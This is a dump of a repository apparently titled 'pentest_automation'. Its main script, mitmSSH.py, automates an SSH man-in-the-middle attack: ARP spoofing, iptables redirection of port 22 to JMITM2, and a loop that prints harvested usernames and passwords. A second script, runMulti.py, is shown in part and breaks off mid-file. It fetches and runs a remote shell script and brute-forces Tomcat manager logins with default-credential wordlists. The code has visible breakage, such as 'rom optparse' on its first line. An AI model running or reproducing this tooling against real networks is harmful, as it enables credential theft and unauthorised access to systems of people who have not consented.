├── README.md ├── mitmSSH.py ├── runMulti.py ├── runSSHmulti.py └── runSSLmulti.py /README.md: -------------------------------------------------------------------------------- 1 | pentest_automation 2 | ================== 3 | mitmSSH.py 4 | Automates the process of ARP spoofing and setting up JMITM2 5 | 6 | Reference: http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ 7 | 8 | -------------------------------------------------------------------------------- /mitmSSH.py: -------------------------------------------------------------------------------- 1 | rom optparse import OptionParser 2 | from scapy.all import * 3 | from subprocess import Popen, PIPE, call 4 | from threading import Timer 5 | import argparse 6 | import commands 7 | import inspect, os, sys 8 | import re 9 | import shlex 10 | import signal 11 | import subprocess, datetime, os, time, signal 12 | import threading 13 | import time 14 | import traceback 15 | 16 | passwordList = [] 17 | 18 | defaultHostMac = '' 19 | defaultGatewayMac = '' 20 | defaultHostIP = '' 21 | defaultGatewayIP = '' 22 | 23 | #currentPath=os.getcwd() 24 | currentPath="/tmp1/tools" 25 | origPath=os.getcwd() 26 | 27 | def signal_handler(signal, frame): 28 | print('\nYou pressed Ctrl+C!') 29 | 30 | #Kill ARP Spoofing 31 | cmd = "pkill -f intercepter" 32 | commands.getoutput(cmd) 33 | cmd = "killall -15 screen" 34 | commands.getoutput(cmd) 35 | 36 | #Flushing IPTables 37 | cmd = "iptables -F" 38 | commands.getoutput(cmd) 39 | 40 | print "[*] Restoring ARP" 41 | #print defaultHostIP, defaultHostMac 42 | #print defaultGatewayIP, defaultGatewayMac 43 | send(ARP(op=2, pdst=defaultGatewayIP, psrc=defaultHostIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=defaultHostMac), count=3, verbose=False) 44 | send(ARP(op=2, pdst=defaultHostIP, psrc=defaultGatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=defaultGatewayMac), count=3, verbose=False) 45 | 46 | sys.exit(0) 47 | 48 | def getMac(ip): 49 | Popen(["ping", "-c 1", str(ip)], stdout = PIPE) 50 | pid = 
Popen(["arp", "-n", str(ip)], stdout = PIPE) 51 | s = pid.communicate()[0] 52 | mac = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0] 53 | return str(ip),str(mac) 54 | 55 | def decorateScreenStringWindow(screenname, id, a): 56 | return "screen -x " + screenname + " -p"+ str(id) +" -X stuff " +"'"+ a + "\r'" 57 | 58 | def decorateDefaultString( screenname, a): 59 | return "screen -x " + screenname + " -X " + a 60 | 61 | def create_screen(sname, windowname = "bash"): 62 | createscreen = ["screen -d -m -S "+ sname + " -t " + windowname] 63 | p = subprocess.Popen(createscreen,shell=True) 64 | 65 | def run_cmd_screen(sname, id, command): 66 | cmd = [decorateScreenStringWindow(sname, id, command)] 67 | subprocess.Popen(cmd, shell=True) 68 | time.sleep(0.3) 69 | 70 | def create_window(sname, windowname): 71 | cmd = [decorateDefaultString(sname, " screen -t \"" + windowname + "\" ")] 72 | subprocess.Popen(cmd, shell=True) 73 | time.sleep(0.2) 74 | 75 | def downloadFiles(): 76 | cmdList=[] 77 | if not os.path.exists(currentPath+"/jmitm2-0.1.0/bin/runm.sh"): 78 | cmd="wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz" 79 | cmdList.append(cmd) 80 | cmd="tar xvfz jmitm2-0.1.0.tar.gz" 81 | cmdList.append(cmd) 82 | else: 83 | cmd="tar xvfz jmitm2-0.1.0.tar.gz" 84 | cmdList.append(cmd) 85 | for cmd in cmdList: 86 | #print cmd 87 | os.chdir(currentPath) 88 | commands.getoutput(cmd).strip() 89 | 90 | cmdList=[] 91 | if not os.path.exists(currentPath+"/intercepter_linux"): 92 | cmd="wget http://intercepter.nerf.ru/Intercepter-NG.CE.05.zip" 93 | cmdList.append(cmd) 94 | cmd="unzip -o Intercepter-NG.CE.05.zip" 95 | cmdList.append(cmd) 96 | cmd="chmod 755 "+currentPath+"/intercepter_linux" 97 | cmdList.append(cmd) 98 | else: 99 | cmd="unzip -o Intercepter-NG.CE.05.zip" 100 | cmdList.append(cmd) 101 | cmd="chmod 755 intercepter_linux" 102 | cmdList.append(cmd) 103 | for cmd in cmdList: 104 | #print cmd 105 | os.chdir(currentPath) 106 | 
commands.getoutput(cmd).strip() 107 | 108 | #if not os.path.exists(currentPath+"/PCredz/Pcredz"): 109 | # cmd="git clone https://github.com/lgandx/PCredz.git" 110 | # print cmd 111 | # os.chdir(currentPath) 112 | # commands.getoutput(cmd).strip() 113 | 114 | def runWithTimeOut(command,timeout): 115 | cmd = command.split(" ") 116 | start = datetime.datetime.now() 117 | process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 118 | while process.poll() is None: 119 | time.sleep(0.1) 120 | now = datetime.datetime.now() 121 | if (now - start).seconds > timeout: 122 | os.kill(process.pid, signal.SIGKILL) 123 | os.waitpid(-1, os.WNOHANG) 124 | return None 125 | return process.stdout.read() 126 | print stderr 127 | 128 | def get_process_children(pid): 129 | p = Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True,stdout = PIPE, stderr = PIPE) 130 | stdout, stderr = p.communicate() 131 | return [int(p) for p in stdout.split()] 132 | 133 | def runCommands(host_addr,gatewayIP): 134 | cmd = "pkill -f intercepter" 135 | commands.getoutput(cmd) 136 | #cmd = "pkill -f Pcredz" 137 | #commands.getoutput(cmd) 138 | cmd = "pkill -f j2ssh" 139 | commands.getoutput(cmd) 140 | 141 | cmd = "killall -15 screen" 142 | commands.getoutput(cmd) 143 | 144 | create_screen("intercepter","intercepter") 145 | #create_screen("pcredz","pcredz") 146 | create_screen("jmitm","pcredz") 147 | 148 | cmdList=[] 149 | cmd = "echo 1 > /proc/sys/net/ipv4/ip_forward" 150 | cmdList.append(cmd) 151 | cmd = "iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2200" 152 | #cmd = "iptables -A PREROUTING -t nat -p tcp --dport 22 -j REDIRECT --to-port 2200" 153 | #cmd = "iptables -A PREROUTING -t nat -i eth0 -p tcp --src "+host_addr+" --dport 22 -j REDIRECT --to-port 2200" 154 | cmdList.append(cmd) 155 | cmd = "iptables -A FORWARD -j ACCEPT" 156 | cmdList.append(cmd) 157 | cmd = "iptables-save" 158 | cmdList.append(cmd) 159 | cmd = currentPath+"/intercepter_linux 1 1" 
160 | #cmd = currentPath+"/intercepter_linux 1 1 w -gw "+gatewayIP+" -t1 "+host_addr 161 | cmdList.append(cmd) 162 | for cmd in cmdList: 163 | #print cmd 164 | run_cmd_screen("intercepter",0,cmd) 165 | 166 | #cmdList=[] 167 | #cmd = "cd "+currentPath+"/PCredz && python2.7 Pcredz -i eth0" 168 | #print cmd 169 | #cmdList.append(cmd) 170 | #for cmd in cmdList: 171 | # run_cmd_screen("pcredz",0,cmd) 172 | 173 | cmdList=[] 174 | cmd = "cd "+currentPath+"/jmitm2-0.1.0/bin && sh runm.sh | tee jmitm2.log" 175 | #print cmd 176 | cmdList.append(cmd) 177 | for cmd in cmdList: 178 | run_cmd_screen("jmitm",0,cmd) 179 | 180 | os.chdir(origPath) 181 | 182 | def analyzeNetwork(targetPort): 183 | print "[*] Analyzing network" 184 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 185 | ethIP = commands.getoutput(cmd).strip() 186 | 187 | #Flushing IPTables 188 | cmd = "iptables -F" 189 | commands.getoutput(cmd) 190 | 191 | #Run ARP Spoofing 192 | cmd = "pkill -f intercepter" 193 | commands.getoutput(cmd) 194 | cmd = "killall -15 screen" 195 | commands.getoutput(cmd) 196 | 197 | create_screen("intercepter","intercepter") 198 | cmdList=[] 199 | cmd = "echo 1 > /proc/sys/net/ipv4/ip_forward" 200 | cmdList.append(cmd) 201 | cmd = "iptables -A FORWARD -j ACCEPT" 202 | cmdList.append(cmd) 203 | cmd = currentPath+"/intercepter_linux 1 1" 204 | #print cmd 205 | cmdList.append(cmd) 206 | for cmd in cmdList: 207 | run_cmd_screen("intercepter",0,cmd) 208 | 209 | #Remove temp file 210 | tempFilename = "/tmp/out" 211 | if os.path.exists(tempFilename): 212 | os.remove(tempFilename) 213 | #cmd = "tshark -i eth0 -T fields -e ip.src -e ip.dst" 214 | 215 | #Checking if Network is Vulnerable to ARP Spoofing 216 | #Add Code Here 217 | 218 | #Checking for SSH traffic 219 | cmd = "tshark -i eth0 port "+targetPort+" and host not "+ethIP+" -T fields -e ip.src -e ip.dst -e tcp.port 2>&1 >> "+tempFilename 220 | newCmd = "bash -c '(sleep 20; pkill -f tshark) & "+cmd+"'" 
221 | 222 | #newCmd = "perl -e 'alarm 10; exec @ARGV' '"+cmd+"'" 223 | #print cmd 224 | 225 | #print runWithTimeOut(cmd,20) 226 | commands.getoutput(newCmd) 227 | 228 | #time.sleep(5) 229 | targetHosts=[] 230 | sourceHosts=[] 231 | if os.path.exists(tempFilename): 232 | lines=[] 233 | with open(tempFilename) as f: 234 | lines = f.read().splitlines() 235 | if len(lines)<1: 236 | print "[!!] No port: "+targetPort+" connections detected" 237 | else: 238 | for line in lines: 239 | host = line.split("\t") 240 | sourceIP = host[0].strip() 241 | targetIP = host[1].strip() 242 | 243 | srcPort = (host[2].split(",")[0]).strip() 244 | tgtPort = (host[2].split(",")[1]).strip() 245 | 246 | if srcPort==targetPort: 247 | if [sourceIP,targetIP] not in targetHosts: 248 | targetHosts.append([sourceIP,targetIP]) 249 | return targetHosts 250 | #for x in targetHosts: 251 | # print x[0]+"\t"+x[1] 252 | else: 253 | print "[!] No port: "+targetPort+" connections detected" 254 | 255 | 256 | #Kill ARP Spoofing 257 | cmd = "pkill -f intercepter" 258 | commands.getoutput(cmd) 259 | cmd = "killall -15 screen" 260 | commands.getoutput(cmd) 261 | 262 | #Flushing IPTables 263 | cmd = "iptables -F" 264 | commands.getoutput(cmd) 265 | 266 | def modifyConfiguration(host_addr,ssh_addr,currentIP): 267 | configFile = currentPath+"/jmitm2-0.1.0/bin/conf/server.xml" 268 | content=[] 269 | newContent=[] 270 | with open(configFile) as f: 271 | content = f.readlines() 272 | for x in content: 273 | if "" in x: 274 | x = ""+currentIP+"" 275 | newContent.append(x) 276 | f = open(configFile, 'w') 277 | for x in newContent: 278 | f.write(x) 279 | f.close() 280 | 281 | configFile = currentPath+"/jmitm2-0.1.0/bin/runm.sh" 282 | f = open(configFile, 'w') 283 | f.write("CLASSPATH=$CLASSPATH:$PWD:$PWD/lib/log4j-1.2.6.jar java -Dsshtools.home=$PWD com.sshtools.j2ssh.MitmGlue "+ssh_addr+" 22") 284 | f.close() 285 | 286 | if __name__ == '__main__': 287 | parser = argparse.ArgumentParser() 288 | 
parser.add_argument('-analyze', action='store_true', help='[analyze network for ssh traffic]') 289 | parser.add_argument('-port', dest='port_no', action='store', help='[port of SSH server]') 290 | parser.add_argument('-host', dest='host_addr', action='store', help='[ip address of internal host]') 291 | parser.add_argument('-ssh', dest='ssh_addr', action='store', help='[ip address of ssh server]') 292 | 293 | options = parser.parse_args() 294 | if not options.analyze and not options.ssh_addr and not options.host_addr: 295 | cmd = "pkill -f intercepter" 296 | commands.getoutput(cmd) 297 | cmd = "pkill -f Pcredz" 298 | commands.getoutput(cmd) 299 | cmd = "pkill -f j2ssh" 300 | commands.getoutput(cmd) 301 | 302 | cmd = "killall -15 screen" 303 | commands.getoutput(cmd) 304 | 305 | cmd = "iptables --flush" 306 | commands.getoutput(cmd) 307 | 308 | parser.print_help() 309 | sys.exit(1) 310 | signal.signal(signal.SIGINT, signal_handler) 311 | if options.analyze and not options.port_no: 312 | downloadFiles() 313 | 314 | targetPort=22 315 | targetHosts=analyzeNetwork(str(targetPort)) 316 | if targetHosts!=None: 317 | if len(targetHosts)>0: 318 | for host in targetHosts: 319 | #print host[0]+"\t"+host[1] 320 | print "**********************************************************" 321 | print "Found the below SSH connections" 322 | print "Host: "+host[1]+"\tSSH Server: "+host[0] 323 | print "**********************************************************" 324 | #cmd = "python2.7 mitmSSH.py -host "+host[1]+" -ssh "+host[0] 325 | #print cmd 326 | #''' 327 | for host in targetHosts: 328 | ssh_addr = host[0] 329 | host_addr = host[1] 330 | 331 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 332 | ethIP = commands.getoutput(cmd).strip() 333 | 334 | print "[*] MITMing Target IP: "+host_addr+" and SSH server: "+ssh_addr 335 | modifyConfiguration(host_addr,ssh_addr,ethIP) 336 | 337 | cmd = "/sbin/ip route | awk '/default/ { print $3 }'" 338 | 
gatewayIP = commands.getoutput(cmd).strip() 339 | 340 | runCommands(host_addr,gatewayIP) 341 | 342 | defaultGatewayIP, defaultGatewayMac = getMac(str(gatewayIP)) 343 | defaultHostIP, defaultHostMac = getMac(str(host_addr)) 344 | 345 | 346 | print "[*] Checking jmitm2.log for login attempts" 347 | while True: 348 | #Check jmitm2.log for login attempts 349 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 350 | results = commands.getoutput(cmd).strip() 351 | resultsList = results.split("\n") 352 | for i in resultsList: 353 | try: 354 | result = i.split("- mitm:")[1].strip() 355 | if result not in passwordList: 356 | print result 357 | passwordList.append(result) 358 | except IndexError: 359 | continue 360 | time.sleep(1) 361 | #''' 362 | else: 363 | print "[!!!] No port: "+str(targetPort)+" traffic detected or network not vulnerable to ARP spoofing" 364 | elif options.analyze and options.port_no: 365 | downloadFiles() 366 | 367 | targetPort=options.port_no 368 | targetHosts=analyzeNetwork(str(targetPort)) 369 | if targetHosts!=None: 370 | if len(targetHosts)>0: 371 | for host in targetHosts: 372 | print host[0]+"\t"+host[1] 373 | print "**********************************************************" 374 | print "Found the below SSH connections" 375 | print "Host: "+host[1]+"\tSSH Server: "+host[0] 376 | print "**********************************************************" 377 | #cmd = "python2.7 mitmSSH.py -host "+host[1]+" -ssh "+host[0] 378 | #print cmd 379 | #''' 380 | if options.port_no=="22": 381 | for host in targetHosts: 382 | ssh_addr = host[0] 383 | host_addr = host[1] 384 | 385 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 386 | ethIP = commands.getoutput(cmd).strip() 387 | 388 | print "[*] MITMing Target IP: "+host_addr+" and SSH server: "+ssh_addr 389 | modifyConfiguration(host_addr,ssh_addr,ethIP) 390 | runCommands(options.host_addr,gatewayIP) 391 | 392 | defaultGatewayIP, 
defaultGatewayMac = getMac(str(gatewayIP)) 393 | defaultHostIP, defaultHostMac = getMac(str(options.host_addr)) 394 | 395 | print "[*] Checking jmitm2.log for login attempts" 396 | while True: 397 | #Check jmitm2.log for login attempts 398 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 399 | results = commands.getoutput(cmd).strip() 400 | resultsList = results.split("\n") 401 | for i in resultsList: 402 | try: 403 | result = i.split("- mitm:")[1].strip() 404 | if result not in passwordList: 405 | print result 406 | passwordList.append(result) 407 | except IndexError: 408 | continue 409 | time.sleep(1) 410 | #''' 411 | else: 412 | print "[!!!!] No port: "+str(targetPort)+" traffic detected or network not vulnerable to ARP spoofing" 413 | else: 414 | downloadFiles() 415 | cmd = "/sbin/ip route | awk '/default/ { print $3 }'" 416 | gatewayIP = commands.getoutput(cmd).strip() 417 | 418 | cmd = "/sbin/ifconfig eth0 | grep 'inet addr' | awk -F: '{print $2}' | awk '{print $1}'" 419 | ethIP = commands.getoutput(cmd).strip() 420 | 421 | modifyConfiguration(options.host_addr,options.ssh_addr,ethIP) 422 | runCommands(options.host_addr,gatewayIP) 423 | 424 | defaultGatewayIP, defaultGatewayMac = getMac(str(gatewayIP)) 425 | defaultHostIP, defaultHostMac = getMac(str(options.host_addr)) 426 | 427 | print "[*] Checking jmitm2.log for login attempts" 428 | while True: 429 | #Check jmitm2.log for login attempts 430 | cmd = "cat "+currentPath+"/jmitm2-0.1.0/bin/jmitm2.log | grep -i 'mitm: username/password'" 431 | results = commands.getoutput(cmd).strip() 432 | resultsList = results.split("\n") 433 | for i in resultsList: 434 | try: 435 | result = i.split("- mitm:")[1].strip() 436 | if result not in passwordList: 437 | print result 438 | passwordList.append(result) 439 | except IndexError: 440 | continue 441 | time.sleep(1) 442 | 443 | 444 | 445 | -------------------------------------------------------------------------------- 
/runMulti.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | #Prequisites 3 | #gem install ruby-nmap 4 | #gem install net-http-persistent 5 | #gem install colorize 6 | #gem install text-table 7 | #gem install mechanize 8 | 9 | #wget http://www.python.org/ftp/python/2.7.6/Python-2.7.6.tgz 10 | #tar -xzf Python-2.7.6.tgz 11 | #cd Python-2.7.6 12 | #./configure && make && make install 13 | 14 | #wget https://bootstrap.pypa.io/get-pip.py 15 | #python2.7 get-pip.py 16 | #pip2.7 install -r /tmp1/tools/clusterd/requirements.txt 17 | 18 | try: 19 | import argparse 20 | except: 21 | print "wget https://pypi.python.org/packages/source/s/setuptools/setuptools-7.0.tar.gz --no-check-certificate && tar xvfz setuptools-7.0.tar.gz && cd setuptools-7.0 && python setup.py install" 22 | print "wget https://pypi.python.org/packages/source/a/argparse/argparse-1.2.1.tar.gz --no-check-certificate && tar xvfz argparse-1.2.1.tar.gz && cd argparse-1.2.1 && python setup.py install" 23 | sys.exit() 24 | import urllib2 25 | import socket 26 | import datetime 27 | import time 28 | import multiprocessing 29 | import commands 30 | import sys 31 | import os 32 | import glob 33 | import re 34 | import httplib 35 | import urllib 36 | import urlparse 37 | 38 | origPath = os.getcwd() 39 | toolsPath = "/tmp1/tools/" 40 | burpPath = "/pentest/burp/carbonator/" 41 | sslCCSPath = toolsPath 42 | yasuoPath = toolsPath+"/yasuo-master/" 43 | clusterdPath = toolsPath+"/clusterd/" 44 | whatwebPath = toolsPath+"/WhatWeb/" 45 | wpscanPath = toolsPath+"/wpscan/" 46 | peepingTomPath = toolsPath+"/peepingtom/" 47 | shellShockPath = toolsPath+"/shocker-master/" 48 | tlssledPath = toolsPath+"/" 49 | fuzzdbPath = toolsPath+"/fuzzdb-read-only/" 50 | patatorPath = toolsPath+"/patator/" 51 | tildePath = toolsPath+"/IIS-ShortName-Scanner/" 52 | vpnPath = "/pentest/vpn/ikeforce/" 53 | 54 | taskToRun="" 55 | domainName="" 56 | numProcesses=10 57 | 58 | def 
checkForASA(host): 59 | url = "https://"+host+"/+CSCOE+/logon.html" 60 | urlparse.urlparse(host) 61 | try: 62 | c = httplib.HTTPSConnection(host,timeout=10) 63 | c.request("HEAD", "/+CSCOE+/logon.html") 64 | response = c.getresponse() 65 | if response.status==200: 66 | return True 67 | except: 68 | return False 69 | 70 | 71 | def downloadFiles(): 72 | import urllib 73 | if not os.path.exists(toolsPath): 74 | #Create folder 75 | cmd = "mkdir "+toolsPath 76 | commands.getoutput(cmd) 77 | 78 | #Download shell script and download prerequisites 79 | cmd = "wget https://raw.githubusercontent.com/milo2012/pentest_automation/master/prequisites.sh && chmod 755 prerequisites.sh && sh prequisites.sh" 80 | commands.getoutput(cmd) 81 | 82 | if not os.path.exists(toolsPath+"/JBoss.fuzz.txt"): 83 | cmd = "cd "+toolsPath+" && wget https://fuzzdb.googlecode.com/svn-history/r158/trunk/discovery/PredictableRes/JBoss.fuzz.txt" 84 | commands.getoutput(cmd) 85 | if not os.path.exists(toolsPath+"/ApacheTomcat.fuzz.txt"): 86 | cmd = "cd "+toolsPath+" && wget https://fuzzdb.googlecode.com/svn-history/r158/trunk/discovery/PredictableRes/ApacheTomcat.fuzz.txt" 87 | commands.getoutput(cmd) 88 | 89 | if not os.path.exists(toolsPath+"/peepingtom"): 90 | cmd = "cd "+toolsPath+" && git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git" 91 | commands.getoutput(cmd) 92 | 93 | cmd = "cd "+toolsPath+" && wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2" 94 | commands.getoutput(cmd) 95 | cmd = "cd "+toolsPath+" && bunzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2" 96 | commands.getoutput(cmd) 97 | cmd = "cd "+toolsPath+" && tar xvf phantomjs-1.9.8-linux-i686.tar" 98 | commands.getoutput(cmd) 99 | cmd = "cd "+toolsPath+" && cp phantomjs-1.9.8-linux-i686/bin/phantomjs "+toolsPath+"/peepingtom" 100 | commands.getoutput(cmd) 101 | 102 | if not os.path.exists(toolsPath+"/clusterd"): 103 | cmd = "cd "+toolsPath+" && git clone https://github.com/hatRiot/clusterd.git" 
104 | commands.getoutput(cmd) 105 | 106 | if not os.path.exists(toolsPath+"/wordList_ssh_hydra.txt"): 107 | testfile = urllib.URLopener() 108 | testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh_hydra.txt",toolsPath+"wordList_ssh_hydra.txt") 109 | 110 | #if not os.path.exists(toolsPath+"/wordList_ssh.txt"): 111 | # testfile = urllib.URLopener() 112 | # testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh.txt", toolsPath+"wordList_ssh.txt") 113 | #if not os.path.exists(toolsPath+"/wordList_telnet.txt"): 114 | # testfile = urllib.URLopener() 115 | # testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt", toolsPath+"wordList_telnet.txt") 116 | 117 | def timeout_command(command, timeout): 118 | import subprocess, datetime, os, time, signal 119 | start = datetime.datetime.now() 120 | process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 121 | while process.poll() is None: 122 | time.sleep(0.1) 123 | now = datetime.datetime.now() 124 | if (now - start).seconds> timeout: 125 | os.kill(process.pid, signal.SIGKILL) 126 | os.waitpid(-1, os.WNOHANG) 127 | return None 128 | return process.stdout.read() 129 | 130 | def RunCommand(fullCmd): 131 | #fullCmd += "& sleep 300; kill $!" 
132 | try: 133 | return commands.getoutput(fullCmd) 134 | except: 135 | return "Error executing command %s" %(fullCmd) 136 | class Worker1(multiprocessing.Process): 137 | 138 | def __init__(self, 139 | work_queue, 140 | result_queue, 141 | ): 142 | multiprocessing.Process.__init__(self) 143 | self.work_queue = work_queue 144 | self.result_queue = result_queue 145 | self.kill_received = False 146 | def run(self): 147 | while (not (self.kill_received)) and (self.work_queue.empty()==False): 148 | try: 149 | job = self.work_queue.get_nowait() 150 | except: 151 | break 152 | (jobid,jobTitle,hostNo,runCmd) = job 153 | runCmd.split(" ") 154 | #rtnVal = (jobid,jobTitle,hostNo,timeout_command(runCmdList,120)) 155 | rtnVal = (jobid,jobTitle,hostNo,RunCommand(runCmd)) 156 | self.result_queue.put(rtnVal) 157 | 158 | def bruteForceTomcat(url): 159 | finalList=[] 160 | url1 = url.replace("/manager/html","") 161 | if not os.path.exists(origPath+"/tomcat_mgr_default_pass.txt"): 162 | urllib.urlretrieve("https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/wordlists/tomcat_mgr_default_pass.txt","tomcat_mgr_default_pass.txt") 163 | if not os.path.exists(origPath+"/tomcat_mgr_default_users.txt"): 164 | urllib.urlretrieve("https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/wordlists/tomcat_mgr_default_users.txt","tomcat_mgr_default_users.txt") 165 | 166 | if "https" in url: 167 | url2 = url1.replace("https://","") 168 | hostList = url2.split(":") 169 | hostNo = hostList[0].strip() 170 | portNo = hostList[1].strip() 171 | logFilename = origPath+"/runPatator_brute_tomcat_https_"+hostNo+"_"+portNo 172 | else: 173 | url2 = url1.replace("http://","") 174 | hostList = url2.split(":") 175 | hostNo = hostList[0].strip() 176 | portNo = hostList[1].strip() 177 | logFilename = origPath+"/runPatator_brute_tomcat_https_"+hostNo+"_"+portNo 178 | 179 | fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz --threads="+str(numProcesses)+" method=HEAD 
url="+url+" user_pass=FILE0:FILE1 0="+origPath+"/tomcat_mgr_default_users.txt 1="+origPath+"/tomcat_mgr_default_pass.txt -l "+logFilename 180 | if not os.path.exists(logFilename): 181 | print "- Bruteforce Tomcat Logins on "+url 182 | #print fullCmd 183 | results = RunCommand(fullCmd) 184 | resultsList = results.split("\n") 185 | for x in resultsList: 186 | if "200" in x: 187 | finalList.append(x) 188 | #if ("200" in x or "401" in x): 189 | # print x 190 | return finalList 191 | 192 | def parseLogs(): 193 | print "\n****** Parsing File/Directory Bruteforce Logs (Patator) ******" 194 | filename = "runPatator_*" 195 | for file in glob.glob(filename): 196 | parseFilename = file.split("_") 197 | scheme = parseFilename[1] 198 | ipAddr = parseFilename[2] 199 | portNo = parseFilename[3] 200 | url = scheme+"://"+ipAddr+":"+portNo 201 | 202 | lines=[] 203 | with open(file+"/RESULTS.csv") as f: 204 | lines = f.read().splitlines() 205 | count=0 206 | resultList=[] 207 | for line in lines: 208 | line1 = line.split(",") 209 | uriPath = line1[-3] 210 | status = line1[-1] 211 | if ("200" in status or "401" in status) and len(uriPath)>0: 212 | #if ("301" not in status and "500" not in status and "302" not in status and "404" not in status and "Unexpected" not in status) and "HTTP" in status: 213 | resultList.append(url+uriPath+"\t\t"+status) 214 | if uriPath=="/manager/html": 215 | tomcatFoundList.append(url+uriPath+"\t\t"+status) 216 | count+=1 217 | if count<10: 218 | for x in resultList: 219 | print x 220 | fileCount=0 221 | filename = "runPatator_brute_tomcat_*" 222 | for file in glob.glob(filename): 223 | fileCount+=1 224 | if fileCount<1: 225 | print "\n****** Found Tomcat Manager Console ****** " 226 | for x in tomcatFoundList: 227 | print x 228 | print "\n****** Testing Default Tomcat Credentials ******" 229 | finalList=[] 230 | tempList=[] 231 | for x in tomcatFoundList: 232 | x1 = x.split("\t")[0] 233 | tempList=bruteForceTomcat(x1) 234 | if len(tempList)<1: 235 | print 
"- No results found" 236 | else: 237 | for y in tempList: 238 | print y 239 | else: 240 | print "\n****** Testing Default Tomcat Credentials ******" 241 | filename = "runPatator_brute_tomcat_*" 242 | for file in glob.glob(filename): 243 | parseFilename = file.split("_") 244 | scheme = parseFilename[3].strip() 245 | ipAddr = parseFilename[4].strip() 246 | portNo = parseFilename[5].strip() 247 | url = scheme+"://"+ipAddr+":"+portNo 248 | url = url.strip() 249 | 250 | lines=[] 251 | with open(file+"/RESULTS.csv") as f: 252 | lines = f.read().splitlines() 253 | resultList=[] 254 | for line in lines: 255 | if "200" in line: 256 | line1 = line.split(",") 257 | creds = line1[-3].strip() 258 | status = line1[-1].strip() 259 | resultList.append(url+"\t"+creds+"\t"+status) 260 | print "- Bruteforce Tomcat Logins on "+url+"/manager/html" 261 | if len(resultList)>0: 262 | for x in resultList: 263 | print x 264 | else: 265 | print "- No results found" 266 | 267 | #Parsing Yasuo Log Files 268 | filename = "runYasuo_*.log" 269 | failedList=[] 270 | vulnList=[] 271 | for file in glob.glob(filename): 272 | lines=[] 273 | with open(file) as f: 274 | lines = f.read().splitlines() 275 | for x in lines: 276 | if "| http" in x: 277 | if x not in vulnList: 278 | vulnList.append(x) 279 | if len(vulnList)>0: 280 | print "\n****** Found the below applications ****** " 281 | for x in vulnList: 282 | print x 283 | 284 | 285 | #Parsing Tlssled Log Files 286 | filename = "runSSLTlssled_*.log" 287 | 288 | failedList=[] 289 | weakCipherList=[] 290 | renegotiationSecureList=[] 291 | renegotiationInsecureList=[] 292 | renegotiationTempList=[] 293 | sslv3List=[] 294 | sslv2List=[] 295 | for file in glob.glob(filename): 296 | lines=[] 297 | with open(file) as f: 298 | lines = f.read().splitlines() 299 | tempTitle="" 300 | renegType="" 301 | for line in lines: 302 | line = line.strip() 303 | if "[*] Running sslscan on " in line: 304 | tempTitle = line 305 | tempTitle = tempTitle.replace("[*] Running 
sslscan on ","") 306 | tempTitle = tempTitle.replace(" ...","") 307 | if "[!] ERROR: The target service " in line: 308 | line = line.replace("[!] ERROR: The target service ","") 309 | line = line.replace("does not seem","") 310 | line = line.replace("to speak SSL/TLS or it is not reachable!!","") 311 | line = line.strip() 312 | if line not in failedList: 313 | failedList.append(line) 314 | if (" 40 bits " in line or " 56 bits " in line) and "Accepted " in line: 315 | if tempTitle not in weakCipherList: 316 | weakCipherList.append(tempTitle) 317 | if "Secure Renegotiation IS supported" in line: 318 | if tempTitle not in renegotiationTempList: 319 | renegotiationTempList.append(tempTitle) 320 | if "Testing for client initiated (CI) SSL/TLS renegotiation (secure)..." in line: 321 | renegType = "secure" 322 | if "Testing for client initiated (CI) SSL/TLS renegotiation (insecure)..." in line: 323 | renegType = "insecure" 324 | if "(CI) SSL/TLS renegotiation IS enabled" in line: 325 | if tempTitle not in renegotiationSecureList and renegType=="secure" and tempTitle in renegotiationTempList: 326 | renegotiationSecureList.append(tempTitle) 327 | if tempTitle not in renegotiationInsecureList and renegType=="insecure" and tempTitle in renegotiationTempList: 328 | renegotiationInsecureList.append(tempTitle) 329 | if " SSLv3" in line and "Accepted" in line: 330 | if tempTitle not in sslv3List: 331 | sslv3List.append(tempTitle) 332 | if " SSLv2" in line and "Accepted" in line: 333 | if tempTitle not in sslv2List: 334 | sslv2List.append(tempTitle) 335 | if len(failedList)>0: 336 | print "\n****** TLSSLed Scan Failure ****** " 337 | for x in failedList: 338 | print x 339 | y = x.split(":") 340 | filename = origPath+"/runSSLTlssled_"+y[0]+"_"+y[1]+".log" 341 | os.remove(filename) 342 | print "Please rerun 'python2.7 runMulti.py -tasks tlssled' to retest failed hosts" 343 | if len(weakCipherList)>0: 344 | print "\n****** Weak TLS/SSL Ciphers ****** " 345 | for x in weakCipherList: 
